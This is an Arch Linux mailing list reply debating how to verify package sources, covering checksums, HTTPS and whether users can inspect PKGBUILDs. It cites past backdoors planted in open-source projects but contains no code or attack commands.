[arch-general] ensuring integrity of sources (was: [arch-dev-public] todo list for moving http -> https sources)

Leonid Isaev leonid.isaev at jila.colorado.edu
Tue Nov 1 05:07:42 UTC 2016


On Tue, Nov 01, 2016 at 03:59:28AM +0100, Lukas Rose wrote:
> > On 01 Nov 2016, at 00:35, Leonid Isaev <leonid.isaev at jila.colorado.edu> wrote:
> > 
> > Well, my mentality is that authenticating plain-text data is usually not
> > necessary because a user can always inspect it
> 
> You just can't reliably inspect plain text install data, unless you spend an
> awful lot of time on it. As already pointed out, it's just too easy to miss
> out small malicious changes. And even if you were able to spot those, most
> average users won't, and that's what policies are meant for: the average
> user.

Perhaps you should try it yourself instead of arguing? I have been doing this
since 2010 with about 50 packages. PKGBUILDs are not usually long and therefore
easy to grasp with a single glance.

> > Regarding checksums, how did a dev know that upstream sources are authentic?
> 
> It's not about the upstream source to be authentic, it's about the upstream
> source reached your hard drive without further (malicious) modification. That
> saying, you can't expect a package maintainer to review all the code he uses
> (indirectly) in his package. If you use another (open source) project, that
> one could always be malicious. But we'll assume that case not likely (in
> general).

On the contrary, planting backdoors in OSS projects is a very likely scenario,
that has happened multiple times already [1-3]...

> It is much more likely that an attacker will try to break things
> you install (although I still assume that this is not often), than a group of
> attackers hiding malicious software in an (open source) project.

Where is such confifence coming from?

> The former
> can be easily locked out by checksums, the latter only by extensive code
> reviews. And even if they were done, you'd still have to trust the one who
> did the review. Since there's an easy fix for the former, let's use it. Since
> there is none for the latter, let's keep an eye on this. There's always trust
> to a certain degree.

I can't really disentangle this pile of... thoughts.

Cheers,
L.

[1] https://en.wikipedia.org/wiki/Vsftpd
[2] http://arstechnica.com/business/2012/02/malicious-backdoor-in-open-source-messaging-apps-not-spotted-for-4-months/
[3] http://security.stackexchange.com/questions/23334/example-of-a-backdoor-submitted-to-an-open-source-project

> 
> Cheers, Lukas

-- 
Leonid Isaev
GPG fingerprints: DA92 034D B4A8 EC51 7EA6  20DF 9291 EE8A 043C B8C4
                  C0DF 20D0 C075 C3F1 E1BE  775A A7AE F6CB 164B 5A6D


More information about the arch-general mailing list